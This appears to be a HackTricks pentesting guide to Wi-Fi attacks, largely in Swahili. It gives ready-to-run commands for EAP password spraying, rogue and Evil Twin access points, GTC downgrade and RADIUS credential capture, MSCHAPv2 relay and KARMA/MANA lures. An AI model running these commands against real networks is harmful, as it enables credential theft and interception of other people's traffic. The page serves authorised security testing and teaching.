- Kukamatwa kwa vifurushi vya association/auth hakupaswi kamwe kuonyesha IMSI mbichi katika EAP-Response/Identity.

Related: Telecom signalling exploitation with captured mobile identifiers
<a class="content_ref" href="../pentesting-network/telecom-network-exploitation.md"><span class="content_ref_label">Telecom Network Exploitation</span></a>

### EAP-Bruteforce (password spray)

If the client is expected to use a **username and password** (zingatia kuwa **EAP-TLS won't be valid** katika kesi hii), basi unaweza kujaribu kupata **list** ya **usernames** (angalia sehemu inayofuata) na **passwords** na kujaribu **bruteforce** upatikanaji kwa kutumia [**air-hammer**](https://github.com/Wh1t3Rh1n0/air-hammer)**.**
```bash
./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt

Unaweza pia kufanya shambulio hili ukitumia eaphammer:

./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid example-wifi \
--password bananas \
--user-list users.txt

Nadharia za Mashambulizi ya Mteja

Uchaguzi wa Mtandao na Uhamahama

  • Protokoli ya 802.11 inaeleza jinsi station inavyounganishwa na Extended Service Set (ESS) lakini haisemi vigezo vya kuchagua ESS au access point (AP) ndani yake.
  • Stations zinaweza kuhamahama kati ya AP zinazoshiriki ESSID sawa, zikidumisha uunganisho katika jengo au eneo.
  • Protokoli inahitaji station kuthibitisha kuingia kwenye ESS lakini haisihi AP kuthibitisha station.

Preferred Network Lists (PNLs)

  • Stations huhifadhi ESSID ya kila mtandao wa wireless wanayounganishwa nao katika Preferred Network List (PNL), pamoja na maelezo ya usanidi maalum wa mtandao.
  • PNL inatumika kuunganishwa kiotomatiki kwa mitandao inayojulikana, kuboresha uzoefu wa mtumiaji kwa kurahisisha mchakato wa kuunganisha.

Passive Scanning

  • AP hupiga beacon frames kwa vipindi mbalimbali, zikitangaza uwepo wao na vipengele, ikiwa ni pamoja na ESSID ya AP isipokuwa uenezaji umezimwa.
  • Wakati wa passive scanning, stations husikiliza beacon frames. Ikiwa ESSID ya beacon inalingana na kipengee katika PNL ya station, station inaweza kuunganishwa kiotomatiki na AP hiyo.
  • Kujua PNL ya kifaa kunaweza kupelekea unyonyaji kwa kuiga ESSID ya mtandao unaojulikana, kuchonga kifaa kuunganishwa na rogue AP.

Active Probing

  • Active probing inahusisha stations kutuma probe requests kugundua AP za karibu na sifa zao.
  • Directed probe requests inalenga ESSID maalum, kusaidia kugundua kama mtandao fulani upo ndani ya umbali, hata kama ni hidden network.
  • Broadcast probe requests zina uwanja wa SSID tupu na zinatumwa kwa AP zote za karibu, zikimruhusu station kukagua mitandao yoyote inayopendekezwa bila kufichua yaliyomo katika PNL yake.

Simple AP with redirection to Internet

Kabla ya kuelezea jinsi ya kufanya mashambulizi magumu zaidi, itafafanuliwa jinsi ya kuunda AP na kuelekeza trafiki yake kwa interface iliyounganishwa na Internet.

Tumia ifconfig -a kuthibitisha kuwa interface ya wlan ya kuunda AP na interface iliyounganishwa na Internet zipo.

DHCP & DNS

apt-get install dnsmasq #Manages DHCP and DNS

Unda faili ya usanidi /etc/dnsmasq.conf:

interface=wlan0
dhcp-authoritative
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

Kisha set IPs na routes:

ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

Kisha anzisha dnsmasq:

dnsmasq -C dnsmasq.conf -d

hostapd

apt-get install hostapd

Unda faili ya usanidi hostapd.conf:

interface=wlan0
driver=nl80211
ssid=MITIWIFI
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=mitmwifi123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1

Simamisha michakato inayosumbua, weka monitor mode, na anzisha hostapd:

airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
hostapd ./hostapd.conf

Kupeleka na Kuongoza Upya

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

Evil Twin

Shambulio la evil twin linatumia jinsi WiFi clients zinavyotambua mitandao, hasa kutegemea jina la mtandao (ESSID) bila kuhitaji base station (access point) kuthibitisha nafsi yake kwa client. Mambo muhimu ni pamoja na:

  • Ugumu wa Kutofautisha: Vifaa vinapata shida kutofautisha kati ya access points halali na rogue access points wakati vinashiriki ESSID moja na aina ya encryption. Mitandao halisi mara nyingi hutumia access points kadhaa zenye ESSID sawa ili kupanua coverage bila mshono.
  • Client Roaming na Manipulation ya Muunganisho: Itifaki ya 802.11 inaruhusu vifaa kuhamia kati ya access points ndani ya ESS moja. Wavamizi wanaweza kutumia hili kwa kuwadanganya kifaa kivunze kuvunja muunganisho na base station (access point) iliyopo na kuungana na rogue access point. Hii inaweza kufikiwa kwa kutoa ishara yenye nguvu zaidi au kuharibu muunganisho kwa legitimate access point kupitia mbinu kama deauthentication packets au jamming.
  • Changamoto katika Utekelezaji: Kutekeleza kwa mafanikio shambulio la evil twin katika mazingira yenye access points nyingi na zilizo pangwa vizuri inaweza kuwa changamoto. Deauthenticating access point halali moja mara nyingi husababisha kifaa kuungana na access point nyingine halali isipokuwa mshambuliaji aweze ku-deauthenticate access points zote zinazokaribu au kuweka rogue access point kwa taktiki.

Unaweza kuunda very basic Open Evil Twin (no capabilities to route traffic to Internet) kwa kufanya:

airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon

Unaweza pia kuunda Evil Twin kwa kutumia eaphammer (kumbuka kwamba ili kuunda evil twins kwa eaphammer, kiolesura HAPASWI KUWA katika monitor mode):

./eaphammer -i wlan0 --essid exampleCorp --captive-portal

Au ukitumia Airgeddon: Options: 5,6,7,8,9 (inside Evil Twin attack menu).

Tafadhali zingatia kwamba kwa chaguo-msingi ikiwa ESSID katika PNL imehifadhiwa kama WPA protected, kifaa hakitaunda kiotomatiki na Open evil Twin. Unaweza kujaribu ku-DoS AP halisi na kutegemea kwamba mtumiaji ataunganisha kwa mikono kwenye Open evil twin yako, au unaweza ku-DoS AP halisi na kutumia WPA Evil Twin kushika handshake (kwa kutumia njia hii hautaweza kumruhusu mwathiriwa kuunganisha kwako kwa sababu haujui PSK, lakini unaweza kushika handshake na kujaribu kucrack).

Some OS and AV zitaonya mtumiaji kwamba kuunganishwa na mtandao wa Open ni hatari…

WPA/WPA2 Evil Twin

Unaweza kuunda Evil Twin using WPA/2 na ikiwa vifaa vimewekwa kuunganishwa na SSID hiyo kwa WPA/2, vitajaribu kuungana. Hata hivyo, ili kumaliza 4-way-handshake pia unahitaji kujua password ambayo client atatumia. Ikiwa hukujui hiyo, kuunganishwa hakutakamilika.

./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"

Enterprise Evil Twin

Ili kuelewa mashambulizi haya, napendekeza kusoma kwanza maelezo mafupi ya WPA Enterprise explanation.

Kutumia hostapd-wpe

hostapd-wpe inahitaji faili la configuration ili ifanye kazi. Ili kuautomate uzalishaji wa configuration hizi unaweza kutumia https://github.com/WJDigby/apd_launchpad (pakua faili ya python ndani ya /etc/hostapd-wpe/)

./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s

Katika faili ya configuration unaweza kuchagua mambo mengi tofauti kama ssid, channel, user files, cret/key, dh parameters, wpa version na auth…

Using hostapd-wpe with EAP-TLS to allow any certificate to login.

Kutumia EAPHammer

# Generate Certificates
./eaphammer --cert-wizard

# Launch Attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

Kwa chaguo-msingi, EAPHammer hutumia njia hizi za authentication (angalia GTC kama ya kwanza kujaribu kupata plaintext passwords na kisha kutumia auth methods zenye nguvu zaidi):

GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5

Hii ndiyo mbinu ya chaguo-msingi ili kuepuka nyakati ndefu za muunganisho. Hata hivyo, unaweza pia kuainisha kwa server njia za uthibitisho kuanzia dhaifu zaidi hadi zenye nguvu zaidi:

--negotiate weakest

Au unaweza pia kutumia:

  • --negotiate gtc-downgrade to use highly efficient GTC downgrade implementation (plaintext passwords)
  • --negotiate manual --phase-1-methods PEAP,TTLS --phase-2-methods MSCHAPV2,GTC,TTLS-PAP to specify manually the methods offered (kwa kufanya hivyo, kwa kutoa auth methods sawa kwa mpangilio uleule kama shirika, shambulio litakuwa ngumu kugundua).
  • Find more info in the wiki

When clients skip RADIUS certificate validation (PEAP/TTLS)

  • Ikiwa vifaa vimewekwa na “do not validate certificate”, cloned AP + rogue RADIUS (eaphammer --cert-wizard --creds --auth wpa-eap) itakusanya NetNTLMv2 (PEAP-MSCHAPv2) au cleartext creds (PEAP-GTC). bettercap deauth (wifi.deauth <BSSID>) inafichua hidden SSIDs wakati wa probes na inalazimisha reconnects, isipokuwa PMF/802.11w ikizuia spoofed deauth.
  • NetNTLMv2 iliyovunjwa inatoa Wi‑Fi/AD creds zinazoweza kutumika tena; GTC hutoa plaintext mara moja.

Relaying PEAP-MSCHAPv2 instead of cracking (wpa_sycophant + hostapd-mana)

  • Kwa akaunti za mashine zenye nywila za nasibu zisizovunjika, tumia MSCHAPv2 relay: endesha hostapd-mana kama Evil Twin, ikipeleka MSCHAPv2 exchange kwa wpa_sycophant, ambayo kwa wakati mmoja inajiunga na AP halali. Relay iliyofanikiwa inatoa Wi‑Fi iliyothibitishwa bila kupata nywila.
  • Tumia builds zinazounga mkono kiwango cha usalama lengwa (WPA3/PMF inahitaji hostapd/wpa_supplicant za hivi karibuni); PMF inazuia deauth coercion, kwa hivyo subiri wateja wajijiunge kwa hiari.

Using Airgeddon

Airgeddon can use previously generated certificated to offer EAP authentication to WPA/WPA2-Enterprise networks. The fake network will downgrade the connection protocol to EAP-MD5 so it will be able to capture the user and the MD5 of the password. Later, the attacker can try to crack the password.
Airggedon offers you the possibility of a continuous Evil Twin attack (noisy) or only create the Evil Attack until someone connects (smooth).

Debugging PEAP and EAP-TTLS TLS tunnels in Evil Twins attacks

This method was tested in an PEAP connection but as I’m decrypting an arbitrary TLS tunnel this should also works with EAP-TTLS

Inside the configuration of hostapd-wpe comment the line that contains dh_file (from dh_file=/etc/hostapd-wpe/certs/dh to #dh_file=/etc/hostapd-wpe/certs/dh)
This will make hostapd-wpe to exchange keys using RSA instead of DH, so you will be able to decrypt the traffic later knowing the servers private key.

Now start the Evil Twin using hostapd-wpe with that modified configuration as usual. Also, start wireshark in the interface which is performing the Evil Twin attack.

Now or later (when you have already captured some authentication intents) you can add the private RSA key to wireshark in: Edit --> Preferences --> Protocols --> TLS --> (RSA keys list) Edit...

Add a new entry and fill the form with this values: IP address = anyPort = 0Protocol = dataKey File (select your key file, to avoid problems select a key file without being password protected).

And look at the new “Decrypted TLS” tab:

KARMA, MANA, Loud MANA and Known beacons attack

ESSID and MAC black/whitelists

Aina tofauti za Media Access Control Filter Lists (MFACLs) na mode zao pamoja na athari kwa tabia ya rogue Access Point (AP):

  1. MAC-based Whitelist:
  • Rogue AP itajibu tu probe requests kutoka kwa vifaa vilivyo kwenye whitelist, ikibaki isiyoonekana kwa wengine wote wasiopo kwenye orodha.
  1. MAC-based Blacklist:
  • Rogue AP itapuuzia probe requests kutoka kwa vifaa vilivyo kwenye blacklist, kwa hivyo kufanya rogue AP isionekane kwa vifaa hivyo maalum.
  1. SSID-based Whitelist:
  • Rogue AP itajibu probe requests tu kwa ESSIDs maalum zilizo kwenye orodha, ikifanya isionekane kwa vifaa ambavyo Preferred Network Lists (PNLs) hazijumuishi ESSIDs hizo.
  1. SSID-based Blacklist:
  • Rogue AP haitajibu probe requests kwa ESSIDs maalum zilizo kwenye blacklist, ikifanya isionekane kwa vifaa vinavyo tafuta mitandao hiyo maalum.
# example EAPHammer MFACL file, wildcards can be used
09:6a:06:c8:36:af
37:ab:46:7a:9a:7c
c7:36:8c:b2:*:*

[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]

# example ESSID-based MFACL file
name1
name2
name3

[--ssid-whitelist /path/to/mac/whitelist/file.txt]
[--ssid-blacklist /path/to/mac/blacklist/file.txt]

KARMA

Njia hii inawawezesha attacker kuunda malicious access point (AP) inayojibu probe requests zote kutoka kwa vifaa vinavyotafuta kuunganishwa kwenye mitandao. Mbinu hii inadanganya vifaa kuunganishwa na attacker’s AP kwa kuiga mitandao ambayo vifaa vinatafuta. Mara kifaa kinapotuma ombi la kuunganishwa kwa rogue AP hii, kuunganishwa hukamilika, na kifaa kuunganishwa kimakosa na mtandao wa attacker.

MANA

Baadaye, vifaa vilianza kupuuza majibu ya mtandao yasiyo thabiti, ikipunguza ufanisi wa karma attack ya awali. Hata hivyo, mbinu mpya, inayoitwa MANA attack, ilitengenezwa na Ian de Villiers na Dominic White. Mbinu hii inahusisha rogue AP kunasa Preferred Network Lists (PNL) kutoka kwa vifaa kwa kujibu broadcast probe requests zao kwa majina ya mitandao (SSIDs) ambayo vifaa vilikuwa vimehifadhi awali. Attack hii ya kisasa inapita kinga dhidi ya karma attack ya awali kwa kutumia jinsi vifaa vinavyokumbuka na kuipa kipaumbele mitandao iliyojulikana.

MANA attack hufanya kazi kwa kufuatilia probe requests za aina zote, directed na broadcast, kutoka kwa vifaa. Kwa directed requests, inarekodi MAC address ya kifaa na requested network name, ikiongeza taarifa hiyo kwenye orodha. Wakati broadcast request inapopokelewa, AP inajibu kwa taarifa zinazolingana na yoyote ya mitandao kwenye orodha ya kifaa, ikivutia kifaa kuunganishwa na rogue AP.

./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]

Loud MANA

Shambulio la Loud MANA attack ni mkakati wa juu unapofaa wakati vifaa havitumi directed probing au wakati Preferred Network Lists (PNL) zao hazijulikani kwa mshambuliaji. Inafanya kazi kwa kanuni kwamba vifaa vilivyo katika eneo moja kwa kawaida vinaweza kushiriki baadhi ya majina ya mitandao katika PNL zao. Badala ya kujibu kwa kuchagua, shambulio hili hutangaza probe responses kwa kila jina la mtandao (ESSID) lililopatikana katika PNL zilizochanganywa za vifaa vyote vilivyotazamwa. Mbinu hii pana inaongeza nafasi ya kifaa kutambua mtandao unaojulikana na kujaribu kuungana na rogue Access Point (AP).

./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]

Known Beacon attack

Iwapo Loud MANA attack haitoshi, Known Beacon attack inatoa njia nyingine. Njia hii brute-forces mchakato wa kuunganishwa kwa kuiga AP inayojibu jina lolote la mtandao, ikizunguka kupitia orodha ya ESSIDs zinazowezekana, ambazo zinatokana na wordlist. Hii inaiga uwepo wa mitandao mingi, ikitarajia kupata ESSID inayolingana na ile ndani ya PNL ya mwathirika, na kusababisha jaribio la kuunganishwa kwenye AP bandia. Shambulio linaweza kuongezwa kwa kuunganisha na chaguo la --loud kwa jaribio kali zaidi la kuwavuta vifaa.

Eaphammer ilitekeleza shambulio hili kama MANA attack ambapo ESSIDs zote ndani ya orodha zinatolewa (pia unaweza kuziunganisha na --loud ili kuunda Loud MANA + Known beacons attack):

./eaphammer -i wlan0 --mana [--loud] --known-beacons  --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]

Known Beacon Burst attack

The Known Beacon Burst attack inahusisha kutangazwa kwa mfululizo kwa beacon frames kwa kila ESSID iliyoorodheshwa kwenye faili. Hii inaunda mazingira yenye msongamano wa mitandao bandia, ikiongeza sana uwezekano wa vifaa kuungana na rogue AP, hasa inapochanganywa na MANA attack. Mbinu hii inatumia kasi na wingi ili kuzidi uwezo wa mifumo ya kuchagua mtandao ya vifaa.

# transmit a burst of 5 forged beacon packets for each entry in list
./forge-beacons -i wlan1 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file known-s.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5

Wi-Fi Direct

Wi-Fi Direct ni itifaki inayoruhusu vifaa kuunganishwa moja kwa moja kwa kutumia Wi-Fi bila haja ya access point ya jadi. Uwezo huu umeingizwa katika vifaa mbalimbali vya Internet of Things (IoT), kama vichapishaji na runinga, na kurahisisha mawasiliano ya kifaa-kwa-kifaa. Sifa muhimu ya Wi-Fi Direct ni kwamba kifaa kimoja kinaweza kuchukua jukumu la access point, kinachojulikana kama group owner, kusimamia muunganisho.

Usalama wa muunganisho za Wi-Fi Direct umewekwa kupitia Wi-Fi Protected Setup (WPS), ambayo inaunga mkono mbinu kadhaa za pairi salama, zikiwemo:

  • Push-Button Configuration (PBC)
  • PIN entry
  • Near-Field Communication (NFC)

Mbinu hizi, hasa PIN entry, zinaweza kukabiliwa na udhaifu sawa na ule wa WPS katika mitandao ya jadi ya Wi-Fi, na kuzifanya kuwa malengo ya vector za shambulio zinazofanana.

EvilDirect Hijacking

EvilDirect Hijacking ni shambulio maalum kwa Wi-Fi Direct. Inafanana na dhana ya Evil Twin attack lakini inalenga muunganisho za Wi-Fi Direct. Katika tukio hili, mshambuliaji anajifanya kuwa group owner halali kwa lengo la kudanganya vifaa vijiunge na entiti ya kiaibu. Mbinu hii inaweza kutekelezwa kwa kutumia zana kama airbase-ng kwa kubainisha channel, ESSID, na MAC address ya kifaa kinachodanganywa:

Marejeo

TODO: Angalia https://github.com/wifiphisher/wifiphisher (kuingia na Facebook na kuiga WPA katika captive portals)

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks